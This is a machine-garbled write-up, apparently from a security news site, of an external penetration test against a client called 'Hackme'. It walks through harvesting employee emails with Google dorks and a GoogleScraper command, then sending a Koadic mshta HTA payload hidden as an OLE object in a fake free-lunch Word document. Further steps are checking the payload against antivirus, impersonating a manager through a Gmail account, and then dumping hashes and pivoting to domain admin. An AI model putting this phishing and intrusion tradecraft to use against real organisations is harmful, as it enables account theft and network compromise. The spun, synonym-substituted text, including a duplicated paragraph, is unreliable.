
The target was easy – see how prone the group is from an exterior viewpoint and check the effectiveness of the safety controls which are managed enterprise-wide. As such, asides, the corporate identify, we got “ZERO” data to carry out an exterior black-box penetration Testing.
This black-box exterior penetration Testing Performing with a by a consumer referred to as (Hackme)
OSINT 101
We kicked off with some Open Supply Intelligence (OSINT) 101 :). There are fairly a lot of open supply intelligence instruments – to help in gathering emails, subdomains, hosts, worker names, and many others from completely different public sources like search engines like google and shodan. There may be an exhaustive listing of such superior instruments right here .
Utilizing fairly a number of open supply intelligence instruments, we obtained publicly accessible paperwork referring to the group utilizing Black-box Penetration Testing strategies.
With Google dork to the rescue, we ran some fundamental search strings: “web site:*.hackme.com ext:xls OR ext:docx OR ext:pptx” .
Additionally Learn: Community Penetration Testing Guidelines
In fact, our goal was to not tirelessly seek for paperwork. Fairly, our goal was to grasp the group’s naming schema by analyzing the metadata of the paperwork which is discovered within the “properties part” of the doc (most particularly Microsoft Phrase, PowerPoint, and Excel). One may use FOCA for this.

From this, I observed that workers emails adopted a specific naming conference – the primary letter of the firstname + surname @ area.com i.e. [email protected].
Armed with this data, we forked out from LinkedIn the listing of all present workers of Hackme utilizing the next google dork syntax:
web site:linkedin.com -inurl:dir “at Hackme” “Present”. A typical instance is proven under utilizing Google Inc as a reference firm.

By hacking a script to automate the method, we copied out the primary names, final names and the roles of the present workers of Hackme.
A tiring method is to manually crawl by means of the google pages in seek for these names and position or one may additionally use GoogleScraper:
GoogleScraper -m http –key phrase “web site:linkedin.com -inurl:dir ‘at Hackme’ ‘Present’” –num-pages-for-keyword 3 –output-filename output.json
End result: Black-box Penetration Testing
Once more, I go away the probabilities to your creativeness – however you possibly can simply convert this to a .csv file utilizing https://json-csv.com/ or some other converter that works for you.
then utilizing your favourite phrase processor (phrase merge, notepad++, and many others) or some good scriptful expertise, merge the firstname + lastname – to type your electronic mail listing.
Feed our Goal listing a Payload
Since we’re simulating a Black-box Penetration Testing, we determined (identical to what an attacker would do) to achieve code execution utilizing malicious payloads. As such, we considered making a payload and sending it through emails to workers of Hackme.
We additionally know that it’s a frequent observe for some file kind/extensions to be blocked by the group’s electronic mail filters – to restrict publicity to threat.
This then brings us to utilizing Koadic C3 COM Command & Management, a really first rate framework identical to your Meterpreter or Empire.
What made it actually stand out asides the attractive interface is that it permits one to dump hashes, obtain/add information, execute instructions, bypass UAC, scan native community for open SMB, pivot to a different machine, load mimikatz and much more.
So we ran Koadic and set the mandatory variables – utilizing the “stager/js/mshta “ module (serves payloads in reminiscence utilizing MSHTA.exe HTML Purposes).

The consequence was a spawn of our HTA payload URL as evidenced within the screenshot above. Nonetheless, we want our targets to execute our payload as “mshta payload_url“.
In recent times, HTA payloads have been used as an online assault vector and likewise, to drop malware on a sufferer’s PC. Now we have to get this payload previous our sufferer’s quite a few defenses.
Right here comes the difficult half – we wanted a solution to have the sufferer run “mshta payload_url” with out our payload being spawned as a baby technique of mshta.exe – as we suspect this group’s blue crew could flag this.

Fortunately, we noticed the tip on the left from Matt Nelson and apparently, the crew at NCC group have this applied in Demiguise.
So right here is our ultimate payload saved as a .hta file.

The subsequent step sometimes is to ship our .hta payload as an embedded OLE object.
The supposed assault state of affairs was:
- Ship a Microsoft phrase doc with our .hta payload embedded as an OLE object.
- Get the person to open the phrase doc and the embedded OLE object.
- This spawns a brand new course of and we get a shell entry into our sufferer’s PC.
Now we get to the attention-grabbing half, we want our sufferer to open the Microsoft phrase doc and our payload.
To do that, we want a really compelling story – simply because customers are getting smarter. So we headed again to doing extra recon.
…and extra recon
We have to know extra about Hackme – particularly the tradition and workers conduct. The query we saved asking ourselves was “what would curiosity the staff?”
The place else to get this data than Glassdoor , a platform that offers you inside scoop on firms with worker evaluations about salaries, advantages, professionals and cons of working with the corporate.
After poring by means of evaluations of Hackme on Glassdoor, we discovered some frequent themes:
…and extra recon
We have to know extra concerning the goal group’s surroundings – particularly workers. The query we saved asking ourselves – what would curiosity the staff?
The place else to get this data than Glassdoor, a platform that offers you inside scoop on firms with worker evaluations about salaries, advantages, professionals and cons of working with the corporate.
After poring by means of evaluations of the goal group on Glassdoor, we discovered some frequent themes:
- Some workers felt mobility was a problem because the workplace is sort of an extended distance from residential areas.
- Staff love the group as a result of they get free lunch.

However Wait!
Just like the previous saying goes, the quickest solution to a person’s coronary heart is thru his abdomen. So what higher solution to get the staff to open our payload embedded phrase doc?
Ship them an electronic mail – telling them there’s a change within the FREE LUNCH menu ranging from tomorrow.
Fairly than ship a random phishing electronic mail to workers that may very well be noticed simply, we determined a seemingly real electronic mail could be supreme full with Hackme electronic mail signature whereas observing the group electronic mail tradition.
Now, how will we make our electronic mail extra plausible? By sending an electronic mail to Customer support/Assist Desk with a service request and observing the e-mail signature within the response.
… recon once more???
We headed again to Linkedin, to search for the identify of both the HR Supervisor, Logistic Supervisor or Admin Supervisor (whichever is acceptable) of Hackme. We rigorously crafted an electronic mail signature with the identify we chosen.

We’re midway by means of sending our payload now. Have some persistence and skim on…
It’s time to ship our payload
From the metadata recon executed earlier, we may inform what our goal group’s doc headers and footers seemed like.
I then created a brand new phrase doc just like the one proven under with a splitting picture of Hackme doc template with acceptable headers/footers.

Then we embedded our .hta as an OLE object. Microsoft Phrase Doc >> Insert >> Object >> Bundle. We modified the icon to Microsoft Phrase’s icon and likewise the caption to mirror our message.

Change the icon to Microsoft Phrase’s icon and likewise, change the caption to mirror your message.
Don’t Overlook the Anti-virus!!!
To verify the AV detection charge of our payload – and to see if will probably be flagged as malicious by Hackme antivirus answer (if any), we did a fast AV scan on nodistribute.com. Nodistribute.com was used as a result of in response to them, they don’t distribute payload samples to AV firms. We scanned each the maldoc and the .hta file as effectively.

AV Scan of our .hta payload (zero detections)

It’s Time to Ship our Electronic mail
If the goal org doesn’t have SPF, DKIM and DMARC configured, one can simply spoof the HR Supervisor, Logistic Supervisor or Admin Supervisor’s electronic mail deal with.
On this case, I created a Gmail account (sure, Gmail works too) utilizing the Logistic Supervisor’s first identify and final identify – after which spiced it up along with his signature which was gotten earlier.

Let the shells in
Shortly after sending the e-mail, inside a interval of about Three minutes, we had no less than 30 shell connections! W00t!!!

What subsequent?
The remaining they typically say is historical past. From here-on, utilizing the mimikatz modules, we escalated privileges, dumped hashes, scanned the native community of Hackme, pivoted into different PCs, browsed the goal’s file methods and even turned area admins and many others.
In conclusion
All in all, this was a really enjoyable engagement. While it might take an attacker a month/2months/a 12 months of dedication to interrupt into a company – by means of a loophole on the infrastructure degree. It may be pretty straightforward for one to achieve entry by exploiting the human issue.
“When you perceive your goal surroundings, devising a inventive means in having access to the surroundings turns into pretty straightforward”.
The ethical of the train is: Recon, recon and extra recon – for a smart man as soon as mentioned
“Give me six hours to cut down a tree and I’ll spend the primary 4 sharpening the axe“.
You may observe us on Linkedin, Twitter, Fb for each day Cybersecurity updates.
Credit:
Rotimi Akinyele – Rotimi is an skilled Cybersecurity, IT Governance, Threat, and Compliance (GRC) skilled. He’s an Assistant Supervisor, Cybersecurity at BDO UAE.
black box security testing methodologies,white box penetration testing,black box penetration testing tools,checklist of penetration testing requirements,how to do penetration testing manually,network penetration testing checklist gbhackers,phases of penetration testing,external penetration testing checklist